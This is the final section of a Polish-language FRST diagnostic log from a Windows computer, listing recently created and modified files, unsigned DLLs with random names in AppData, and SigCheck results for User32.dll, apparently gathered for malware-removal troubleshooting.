2019-04-13 15:12 - 2018-12-12 12:32 - 000127360 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_cdcacm.sys
2019-04-13 15:12 - 2018-12-12 12:32 - 000116864 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_usbdev.sys
2019-04-13 15:12 - 2018-12-12 12:32 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbser.sys
2019-04-13 15:12 - 2018-12-12 12:32 - 000018944 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbccgpfilter.sys
2019-04-03 17:00 - 2019-04-03 17:00 - 000000000 ____D C:\ProgramData\McAfee

==================== Jeden miesiąc (zmodyfikowane) ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2019-05-02 09:02 - 2011-04-12 15:21 - 000744552 _____ C:\Windows\system32\perfh015.dat
2019-05-02 09:02 - 2011-04-12 15:21 - 000157500 _____ C:\Windows\system32\perfc015.dat
2019-05-02 09:02 - 2009-07-14 07:13 - 000899894 _____ C:\Windows\system32\PerfStringBackup.INI
2019-04-30 19:19 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2019-04-30 15:47 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2019-04-30 15:45 - 2019-02-20 10:21 - 000000000 ____D C:\ProgramData\3B1FB597
2019-04-30 15:45 - 2017-03-16 22:07 - 000000000 ____D C:\ProgramData\NVIDIA
2019-04-30 15:45 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-04-30 15:45 - 2009-07-14 06:45 - 000016656 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-04-30 15:45 - 2009-07-14 06:45 - 000016656 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-04-30 15:29 - 2017-05-14 11:40 - 000000000 ____D C:\Windows\system32\appmgmt
2019-04-30 15:28 - 2017-03-17 17:29 - 000003886 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1489764596
2019-04-30 15:28 - 2017-03-17 17:18 - 000000000 ____D C:\Program Files\Opera
2019-04-30 15:12 - 2017-11-24 00:40 - 000000000 ____D C:\Users\user\AppData\Local\chromium
2019-04-30 15:01 - 2017-03-16 21:50 - 000000000 __SHD C:\Users\user\IntelGraphicsProfiles
2019-04-26 17:49 - 2019-02-04 19:48 - 000000000 ____D C:\Users\user\Desktop\obrazki
2019-04-26 17:47 - 2019-02-20 19:34 - 000000000 ____D C:\Users\user\Desktop\KOŁOBRZEG
2019-04-26 17:38 - 2017-11-24 00:38 - 000000000 ____D C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9}
2019-04-25 18:15 - 2017-08-12 12:43 - 000000000 ____D C:\Users\user\Desktop\Zdjęcia i filmiki
2019-04-25 18:01 - 2019-02-20 20:14 - 000000000 ____D C:\Users\user\Desktop\zdjęcia do wywołania
2019-04-22 15:45 - 2019-02-09 21:37 - 000000000 ____D C:\Users\user\Desktop\wszystko
2019-04-17 20:39 - 2019-01-13 12:24 - 000003310 _____ C:\Windows\System32\Tasks\EOSv3 Scheduler onLogOn
2019-04-17 20:39 - 2019-01-13 12:24 - 000003306 _____ C:\Windows\System32\Tasks\EOSv3 Scheduler onTime
2019-04-16 16:26 - 2017-07-11 12:03 - 000000000 ____D C:\Windows\Minidump
2019-04-14 20:24 - 2017-05-03 11:03 - 000000000 ____D C:\Users\user\AppData\Local\CrashDumps
2019-04-11 16:50 - 2017-10-20 00:25 - 000004424 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2019-04-11 16:50 - 2017-03-17 17:36 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-04-11 16:50 - 2017-03-17 17:36 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-04-11 16:50 - 2017-03-17 17:36 - 000004582 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2019-04-11 16:50 - 2017-03-17 17:36 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-04-11 16:50 - 2017-03-17 17:36 - 000000000 ____D C:\Windows\system32\Macromed
2019-04-03 16:59 - 2017-04-17 16:13 - 000000000 ____D C:\Windows\system32\log
2019-04-03 16:53 - 2017-11-08 18:03 - 000000000 ____D C:\ProgramData\Wondershare
2019-04-03 16:53 - 2017-11-08 18:03 - 000000000 ____D C:\Program Files (x86)\Wondershare

==================== Pliki w katalogu głównym wybranych folderów =======

2019-03-26 17:18 - 2019-03-26 17:18 - 000457728 _____ () C:\Users\user\AppData\Roaming\CCBcXkRw.dll
2019-03-26 01:04 - 2019-03-26 01:04 - 000457728 _____ () C:\Users\user\AppData\Roaming\CvJLtdsf.dll
2019-02-20 19:31 - 2019-02-20 19:31 - 000345600 _____ () C:\Users\user\AppData\Roaming\WoT.dll
2017-12-12 18:15 - 2017-12-13 18:38 - 000000068 _____ () C:\Users\user\AppData\Local\RPNLJHFDBz

==================== SigCheck ===============================

(Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.)

C:\Windows\system32\User32.dll [2010-11-21 05:24] - [2017-03-16 18:08] - 001008640 _____ (Microsoft Corporation) 2C353B6CE0C8D03225CAA2AF33B68D79
C:\Windows\SysWOW64\User32.dll [2010-11-21 05:24] - [2017-03-16 18:08] - 000833024 _____ (Microsoft Corporation) 861C4346F9281DC0380DE72C8D55D6BE

LastRegBack: 2019-04-11 17:46

==================== Koniec FRST.txt ============================